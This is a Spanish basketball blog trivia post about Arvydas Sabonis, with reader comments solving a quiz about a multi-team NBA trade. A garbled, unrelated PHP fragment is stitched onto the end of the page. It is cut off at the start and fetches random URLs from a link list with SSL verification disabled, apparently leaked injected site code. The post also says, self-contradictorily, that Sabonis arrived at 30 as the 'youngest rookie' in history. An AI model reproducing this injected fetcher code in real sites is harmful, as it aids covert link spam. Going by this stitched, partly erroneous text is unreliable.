Trivial #12: Arvydas Sabonis, el Gigante del Este

13 de October de 2009 por txusma

Hizo falta un pequeño empujoncito para que Kantonyo acabara descubriendo que Arvydas Sabonis, el jugador que recibió el impacto de la toalla lanzada por Rasheed Wallace, fue drafteado en primera estancia por los Atlanta Haws en 1985, pero que debido a que todavía no había cumplido los 21 años, aquella elección se convirtió en agua de borrajas. Un año después los Portland TrailBlazers lo eligieron en primera ronda, en el puesto 24.

Cualquier cosa que no sea dedicarle un artículo entero al Gigante del Este no le haría justicia pero me permito presentar 4 pinceladas de su carrera en la NBA para demostrar lo grande que fue.

A los 30 años llegó a los Blazers como el rookie más joven de la historia promediando, a pesar de la edad y de la famosa lesión de 1986, 14.5 puntos y 8 rebotes por partido. Sabonis había perdido movilidad pero seguía siendo un pívot de 2,20m con una gran capacidad para leer el juego en la pista y asistir a sus compañeros, un buen tiro de media distancia y un talento aúnmás grande que él. Fue en la temporada 1997-98, a los 33 años, cuando cuajó sus mejores números en la NBA: 16 puntos, 10 rebotes y 3 asistencias por partido en la temporada del Lock Out.

Muchos de los que se han enfrentado a él aseguran sin duda que era mejor que los Ewing, Robinson y compañía y eso que no lo conocieron en plenitud de facultades físicas. Jamás sabremos cómo se hubiera escrito la historia sin esa grave lesión que sufrió en el tendon de aquiles en 1986.

¿Tenéis ganas de seguir jugando?

¿Cuál ha sido el traspaso NBA en el que más jugadores españoles intervenían?

Comenta

16 comentarios a esta entrada

  1. sergio dice:
    #1

    kantonyo? no fui yo? ¬¬

    respondiendo a la pregunta… pues no se me ocurren mas que el de los hermanos gasol entre Lakers y Memphis

      Citar

  2. Óscar dice:
    #2

    ¿El de Pau a Lakers por los derechos de Marc Gasol para Memphis?

      Citar

  3. Óscar dice:
    #3

    Joé, técnicamente como dirían los “bosses” hemos contestado a la vez, Sergio.
    Pero me da que va a ser más complicado, no tan inmediato… mmm, no sé yo.

      Citar

  4. L.Casei dice:
    #4

    Ver a Sabonis a tu lado cuando eres un niño es algo que no olvidas. Aún guardo como oro en paño un papelucho con su autógrafo a la salida del pabellón de Lugo cuando jugó con el Madrid. Entrenando la noche anterior, le ví meter tres tiros seguidos desde el centro de la cancha antes de irse a la ducha, como si nada, entre risas… Un jugador genial, con lo difícil que es serlo con 2,21….
    Por cierto, junto a su firma guardo la de Semenova, una pivot rusa de 2,11 que se encontró mi padre en un aeropuerto en los 80… pena no haberla visto a ella también… el apellido se las trae jeje la recordáis?

      Citar

  5. TheDeerHunter dice:
    #5

    Me temo que esta vez no, Sergio… la respuesta correcta la dió Kantonyo

      Citar

  6. sergio dice:
    #6

    jaja… es que no me habia fijao siquiera en el resto de respuestas… y ademas eso me pasa por no contrastar lo que pienso con informacion… estas muy bien otorgada a Katonyo.

    Tienes razon Oscar… no puede ser tan intuitiva la respuesta… aqui siempre buscan el “intringulis” xD (muy bien buscado por cierto)

      Citar

  7. sergio dice:
    #7

    por cierto… por si pedis concretar algo mas…

    Pau Gasol por Kwane Brown (una maquina el tio) y Javaris Crittenton si no me equivoco mas dos primeras rondas de draft en años alternos que supongo que han sido 2008 y 2010.

    (mas vale prevenir….)

      Citar

  8. Txusma dice:
    #8

    Nos encanta el “intringulis”… y si fuera el trade de los Gasol no tendria tanta gracia, verdad?

      Citar

  9. Dantley2 dice:
    #9

    Evidentemente no es el de los Gasol. De momento no hay más pistas

      Citar

  10. kantonyo dice:
    #10

    Yo creo que fue en uno de los traspasos con mas jugadores de la historia… A ver si puedo explicarlo… Raul Lopez se fue a Memphis Grizzlies, en los que nunca llego a jugar, en un multitraspaso que tambien involucró a Roberto Dueñas y Albert Miralles.

    Antoine Walker se fue de Boston a Miami, por su parte Miami Heat recibió a Andre Emmet, James Posey y Jason Williams de Memphis, Memphis además traspasó a Utah a Greg Ostertag, Miami traspasó a Qyntel Woods, Albert Miralles, dos 2ndas rondas a Boston, Miami a su vez además traspaso a Rasual Butler a Hornets. Los Hornets traspasaron a Dueñas a Heat y por último Raul Lopez acabo en Memphis desde Utah.

      Citar

  11. Dantley2 dice:
    #11

    Puuuuuunto para Kantonyo ¡¡¡ No es que fuera muy difícil, pero había que caer en la cuenta de que había tres españoles que no estaban en la NBA, dos de ellos que nunca han llegado a pisarla. Raúl López con otras rodillas, quizá aún seguiría en Utah. Recordemos que fue elegido incluso por delante de Tony Parker o Gilbert Arenas.

      Citar

  12. kantonyo dice:
    #12

    como diría uno de los mejores jugador de baloncesto de la historia…. Tres puntos colega!!!

      Citar

  13. univerzee dice:
    #13

    Perdonada la molestia, pero como veo que os gustan los juegos, os dejo un enlace y una pregunta. Quien de estos triunfo, además de en el baloncesto universitario en la pequeña pantalla y con qué?

    http://assets.espn.go.com/photo/2009/0528/nba_jabbarbruins01_800.jpg

      Citar

  14. sergio dice:
    #14

    esa si que la se UNIVERZEE…. Michael Warren que era (y es?) actor. Solo lo conozco de oirlo comentar de vez en cuando en el Staples cuando aparece (hace tiempo que no lo veo). Si no recuerdo mal es de la serie City of Angels, y por lo que realmente me acuerdo es porque es suegro de Jessica Alba…. es decir, que odio a su hijo. En la foto es el de la izquierda no?

      Citar

  15. Txusma dice:
    #15

    jajaja…

    A Sergio no lo pillas!

      Citar

  16. univerzee dice:
    #16

    Si, Mike Warren cuando jugaba con Jabbar, Alcindor, después Michael Warren. Pero joer, debéis de ser más jóvenes que yo porque yo si lo recuerdo es por la serie Canción triste de Hill Street. 🙁

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>